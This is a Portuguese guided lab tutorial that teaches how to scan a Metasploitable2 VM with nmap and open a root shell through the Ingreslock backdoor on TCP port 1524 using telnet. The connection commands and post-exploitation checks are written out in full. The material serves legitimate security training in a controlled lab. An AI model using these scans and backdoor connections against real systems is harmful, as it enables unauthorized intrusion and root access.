Explorar a Vulnerabilidade Ingreslock com Nmap

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, você aprenderá como explorar a vulnerabilidade do serviço Ingreslock para obter acesso root a uma máquina alvo. O ambiente do laboratório é baseado nas máquinas virtuais Kali e Metasploitable2 fornecidas pela LabEx. O objetivo deste laboratório é entender a vulnerabilidade do Ingreslock, realizar uma varredura de penetração usando o Nmap e, em última análise, obter acesso root à máquina Metasploitable2 através da exploração do backdoor Ingreslock.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 96%. Recebeu uma taxa de avaliações positivas de 95% dos estudantes.

Entendendo a Vulnerabilidade Ingreslock e Configurando o Ambiente

A vulnerabilidade Ingreslock é uma falha de segurança antiga, mas ainda relevante, relacionada ao sistema de gerenciamento de banco de dados (SGBD) Ingres. A porta TCP 1524 é frequentemente usada por invasores como uma porta backdoor para manter o acesso a sistemas comprometidos.

Nesta etapa, você aprenderá sobre a vulnerabilidade Ingreslock e suas implicações.

A vulnerabilidade Ingreslock decorre do fato de que a porta TCP 1524 era comumente usada como uma porta de escuta backdoor por invasores após comprometerem com sucesso um sistema. A simplicidade de explorar essa vulnerabilidade reside na capacidade de obter acesso em nível de root à máquina alvo simplesmente conectando-se à porta aberta.

Embora essa vulnerabilidade seja considerada antiga, ela ainda está presente em alguns sistemas legados, tornando-a digna de compreensão e exploração em um ambiente controlado.

  1. Abra um terminal xfce na máquina host LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo fazendo ping nela:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

  1. Inicie o contêiner Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro do contêiner Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102

Pressione Ctrl+C para parar o ping.

Realizando uma Varredura de Penetração

Nesta etapa, você realizará uma varredura de penetração na máquina alvo Metasploitable2 usando o Nmap para identificar portas abertas e serviços em execução no alvo.

  1. Inicie a máquina virtual Metasploitable2 e certifique-se de que ela esteja em execução.
  2. Inicie o contêiner Kali e entre no shell bash.
  3. Dentro do contêiner Kali, execute o seguinte comando para realizar uma varredura abrangente na máquina alvo:
nmap -sV -T4 target-ip-address

A opção -sV instrui o Nmap a sondar portas abertas para determinar informações de serviço/versão, enquanto -T4 define o modelo de tempo para um nível agressivo (valores mais altos de 0 a 5 aumentam a agressividade).

Inicie o serviço PostgreSQL e inicialize o banco de dados Metasploit:

cd ~
service postgresql start
msfdb init

Inicie o console Metasploit:

msfconsole

Realize uma varredura abrangente na máquina alvo:

nmap -sV -T4 192.168.122.102

Aqui está um exemplo da saída que você pode ver:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

Esta série de comandos inicia o serviço PostgreSQL, inicializa o banco de dados Metasploit, inicia o console Metasploit e, em seguida, realiza uma varredura abrangente na máquina alvo usando o Nmap.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, inicie a inspeção

Explorando o Backdoor Ingreslock

Nesta etapa, você explorará a vulnerabilidade do backdoor Ingreslock para obter acesso root à máquina alvo Metasploitable2.

  1. Antes de tudo, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
  1. Instale o pacote telnet no console Metasploit:
apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet
  1. Use o comando telnet para conectar-se à porta backdoor Ingreslock na máquina alvo:
telnet 192.168.122.102 1524

Se a conexão for bem-sucedida, você deverá obter acesso root à máquina alvo.

  1. Agora, você precisa verificar se a exploração do backdoor Ingreslock foi bem-sucedida, verificando o endereço IP, o nome do host e o usuário atual na máquina comprometida. Após conectar-se à máquina alvo via backdoor Ingreslock, execute os seguintes comandos:

Verifique o endereço IP da máquina comprometida:

ifconfig

Verifique o nome do host da máquina comprometida:

hostname

Verifique o usuário atual na máquina comprometida:

whoami

Se a exploração foi bem-sucedida, você deverá ver o endereço IP, o nome do host e o usuário atual como root na máquina alvo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, inicie a inspeção

Resumo

Neste laboratório, você aprendeu sobre a vulnerabilidade Ingreslock, que permitiu que invasores obtivessem acesso root a sistemas comprometidos conectando-se à porta TCP 1524. Você realizou uma varredura de penetração usando o Nmap para identificar portas e serviços abertos na máquina alvo. Após detectar a porta backdoor Ingreslock, você explorou a vulnerabilidade usando o comando telnet para obter acesso root. Finalmente, você verificou a exploração bem-sucedida, verificando o endereço IP, o nome do host e o usuário atual na máquina comprometida. Este laboratório proporcionou experiência prática na compreensão e exploração de uma vulnerabilidade do mundo real, enfatizando a importância da aplicação de patches de segurança e do fortalecimento de sistemas contra tais backdoors.